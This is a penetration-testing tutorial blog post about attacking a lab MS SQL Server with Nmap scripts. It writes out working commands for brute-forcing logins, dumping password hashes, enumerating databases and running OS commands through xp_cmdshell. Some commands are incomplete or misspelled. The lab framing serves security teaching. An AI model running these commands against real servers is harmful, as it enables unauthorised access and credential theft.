MSSQL Peneration Testing using Nmap
Hello friends! Today we are going to perform Microsoft SQL penetration testing using NMAP scripts in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article, we had set up Microsoft SQL server in Windows 10.
Attacker: Kali Linux (NMAP)
Target: Windows 10 (MS SQL Server)
Scan port 1433
Open the terminal in Kali Linux and scan target IP for port 1433 using nmap command.
nmap -p 1433 192.168.1.104
From given below image you can observe that port 1433 is open for MS-SQL service.
Enumerating version information
Given below command will attempt to determine configuration and version information for Microsoft SQL Server instances.
nmap -p 1433 --script ms-sql-info 192.168.1.104
In specified below image you can observe the install version and details of MS-SQL server.
Brute Force Attacker
Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104
In the specified image you can observe that we had successfully retrieve credential for two users:
- Username: ignite and password:12345
- Username: sa and password:admin123
Execute MS-SQL Query
Once you have retrieved the login credential use these credential in NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL server.
Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.
nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query="sp_databases" 192.168.1.104
Hence as result, it has dumped two database names “ignite & master” whereas master is the default database name of MS_SQL server.
Check Microsoft SQL server configuration
The following command will attempt to describe the Microsoft SQL server configuration setting by passing login credential as an argument through nmap script.
nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
Hence you can check configuration setting from given below image.
Obtain a list of tables
The following command will attempt to fetch a list of tables from inside Microsoft SQL server by passing login credential as an argument through nmap script.
nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
Hence you can checklist of tables from given below image.
Enumerate NetBIOS information
Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.
Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with an NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.
nmap -p 1433 --script ms-sql-ntlm-info 192.168.1.104
Hence from given below image, you can read the NetBIOS information remote Microsoft SQL server.
Dump password hashes
The following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. In order to do so, the user needs to have the appropriate DB privileges.
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
From the given image you can observe that it has dumped the hash value of passwords of user: sa which we have enumerated above.
Identify the database owner
Following command will execute a query against Microsoft SQL Server instances for a list of databases a user has access to. In order to do so, the user needs to have the appropriate DB privileges. Therefore we have passes username and password as an argument through NMAP script.
nmap -p 1433 --script ms-sql-hashdbaccess --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
In the specified image you can observe that it showing user sa is owner the database “ignite”.
Ms-SQL Allows XP_cmdshell option
The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute an operating system command. By default, the xp_cmdshell option is disabled.
From given below image you can see we had enabled the xp_cmdshell function by executing the following statement inside the master database.
EXEC sp_configure ‘xp_cmdshell’;
Now save the above configuration setting through the following statement:
Exploit XP_cmdshell Function
Now following NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in the targeted server.
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123,ms-sql-sql-xp-cmdshell.cmd="net user " 192.168.1.104
From the given image you can confirm that we have executed OS command: net user as retrieving user account.
Blank password lead to unauthorized access
If the admin of Microsoft-SQL Server left the password Blank for login then the attacker can director login into the database server, from given below image you can see we are exploring the property of a user’s account “sa”.
Here kept “blank space” as the password for user “sa”. As we know by default sa is admin of MS-SQL server and now its password is blank space, therefore, chances of making unauthorized access into the server by the attacker will get increases.
Make unauthorized access into SQL server
Following NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.
nmap -p 1433 --script ms-sql-empty-password 192.168.1.104
From given below image you can perceive we had made successfully login with user: sa and an empty password.
Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher Contact Here